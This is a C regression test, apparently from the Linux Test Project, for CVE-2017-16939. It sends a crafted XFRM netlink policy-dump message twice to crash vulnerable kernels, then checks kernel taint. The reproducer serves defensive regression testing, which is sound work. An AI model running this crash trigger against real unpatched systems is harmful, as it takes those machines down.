1 // SPDX-License-Identifier: GPL-2.0-or-later
2 /*
3 * Copyright (c) 2018 Michael Moese <mmoese@suse.de>
4 */
5 /* Regression test for commit:
6 * 1137b5e2529a ipsec: Fix aborted xfrm policy dump crash aka CVE-2017-16939
7 *
8 * Based on the reproducing code from Mohammed Ghannam, published on
9 * https://blogs.securiteam.com/index.php/archives/3535
10 *
11 * CAUTION! If your system is vulnerable to this CVE, the kernel
12 * WILL DIE!
13 */
14
15 #include <unistd.h>
16 #include <stdlib.h>
17 #include <string.h>
18 #include <sys/socket.h>
19 #include <sys/wait.h>
20 #include <netinet/in.h>
21 #include <linux/netlink.h>
22
23 #include "lapi/xfrm.h"
24 #include "tst_test.h"
25 #include "tst_res_flags.h"
26 #include "tst_safe_macros.h"
27 #include "tst_safe_net.h"
28 #include "lapi/sched.h"
29
30 static int fd = -1;
31 static struct sockaddr_nl nl_addr;
32 static struct nlmsghdr xfrm_msg;
33
setup(void)34 static void setup(void)
35 {
36 tst_setup_netns();
37
38 nl_addr.nl_family = AF_NETLINK;
39 nl_addr.nl_pid = 0; /* packet goes into the kernel */
40 nl_addr.nl_groups = XFRMNLGRP_NONE; /* no need for multicast group */
41
42 xfrm_msg.nlmsg_len = NLMSG_LENGTH(0);
43 xfrm_msg.nlmsg_type = XFRM_MSG_GETPOLICY;
44 xfrm_msg.nlmsg_flags = NLM_F_MATCH | NLM_F_MULTI | NLM_F_REQUEST;
45 xfrm_msg.nlmsg_seq = 0x1;
46 xfrm_msg.nlmsg_pid = 2;
47 }
48
send_nlmsg(int fd,struct nlmsghdr * msg,struct sockaddr_nl * addr)49 static void send_nlmsg(int fd, struct nlmsghdr *msg, struct sockaddr_nl *addr)
50 {
51 SAFE_SENDTO(1, fd, (void *)msg, msg->nlmsg_len, 0,
52 (struct sockaddr *)addr, sizeof(struct sockaddr_nl));
53 }
54
run(void)55 static void run(void)
56 {
57 fd = SAFE_SOCKET(PF_NETLINK, SOCK_RAW, NETLINK_XFRM);
58 SAFE_SETSOCKOPT_INT(fd, SOL_SOCKET, SO_RCVBUF, 0x100);
59
60 /* message must be sent twice to trigger the bug */
61 send_nlmsg(fd, &xfrm_msg, &nl_addr);
62 send_nlmsg(fd, &xfrm_msg, &nl_addr);
63 SAFE_CLOSE(fd);
64
65 /* wait for socket close callback to crash */
66 usleep(100000);
67
68 if (tst_taint_check()) {
69 tst_res(TFAIL, "Kernel is vulnerable");
70 return;
71 }
72
73 tst_res(TPASS, "Kernel seems to have survived");
74 }
75
cleanup(void)76 static void cleanup(void)
77 {
78 if (fd >= 0)
79 SAFE_CLOSE(fd);
80 }
81
82 static struct tst_test test = {
83 .setup = setup,
84 .test_all = run,
85 .cleanup = cleanup,
86 .taint_check = TST_TAINT_W | TST_TAINT_D,
87 .needs_kconfigs = (const char *[]) {
88 "CONFIG_USER_NS=y",
89 "CONFIG_NET_NS=y",
90 NULL
91 },
92 .save_restore = (const struct tst_path_val[]) {
93 {"/proc/sys/user/max_user_namespaces", "1024", TST_SR_SKIP},
94 {}
95 },
96 .tags = (const struct tst_tag[]) {
97 {"linux-git", "1137b5e2529a"},
98 {"CVE", "2017-16939"},
99 {}
100 }
101 };
102